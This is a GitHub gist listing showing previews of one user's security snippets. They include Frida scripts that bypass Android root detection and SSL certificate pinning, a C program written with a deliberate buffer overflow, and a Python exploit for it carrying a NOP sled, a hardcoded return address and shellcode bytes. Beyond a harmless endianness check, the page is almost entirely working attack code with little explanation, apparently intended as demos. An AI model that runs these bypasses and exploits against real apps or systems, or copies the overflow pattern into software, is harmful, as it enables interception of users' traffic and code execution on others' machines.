Skip to content

Instantly share code, notes, and snippets.

@saibikalpa
saibikalpa / root-ssl-pin-bypass.js
Last active June 2, 2022 08:25
root & ssl pinning bypass with Frida
Java.perform(function(){
console.log("\nRoot detection & SSL pinning bypass with Frida");
var CertificateFactory = Java.use("java.security.cert.CertificateFactory");
var FileInputStream = Java.use("java.io.FileInputStream");
var BufferedInputStream = Java.use("java.io.BufferedInputStream");
var X509Certificate = Java.use("java.security.cert.X509Certificate");
var KeyStore = Java.use("java.security.KeyStore");
var TrustManagerFactory = Java.use("javax.net.ssl.TrustManagerFactory");
var SSLContext = Java.use("javax.net.ssl.SSLContext");
var Volley = Java.use("com.android.volley.toolbox.Volley");
@saibikalpa
saibikalpa / endian.c
Created January 8, 2019 06:35
Sample C program to determine endianness
#include <stdio.h>
union s{
int n;
char b;
}x;
void main(){
x.n = 0x4142;
if(x.b == 0x42){
printf("Little Endian\n");
}
@saibikalpa
saibikalpa / bof_demo.c
Created January 8, 2019 06:34
Sample C program vulnerable to buffer overflow
#include <stdio.h>
#include <unistd.h>
int foo(){
char buffer[600];
int characters_read;
printf("Enter some string:\n");
characters_read = read(0, buffer, 1000);
printf("You entered: %s", buffer);
return 0;
@saibikalpa
saibikalpa / bof_demo_exploit.py
Created January 8, 2019 06:30
sample 64 bit buffer overflow exploit
from struct import pack
payload_len = 616
nop = "\x90"*300
rip = 0x00007fffffffdefc
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\x4b\x39\x49\xc0\x26\xc4\xb7"
buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
@saibikalpa
saibikalpa / root-detection-bypass.js
Created January 8, 2019 06:15
Sample root detection bypass script
Java.perform(function(){
console.log("\nRoot detection bypass with Frida");
var DeviceUtils = Java.use("utils.DeviceUtils");
console.log("\nHijacking isDeviceRooted function in DeviceUtils class");
DeviceUtils.isDeviceRooted.implementation = function(){
console.log("\nInside the isDeviceRooted function");
return false;
};
console.log("\nRoot detection bypassed");
});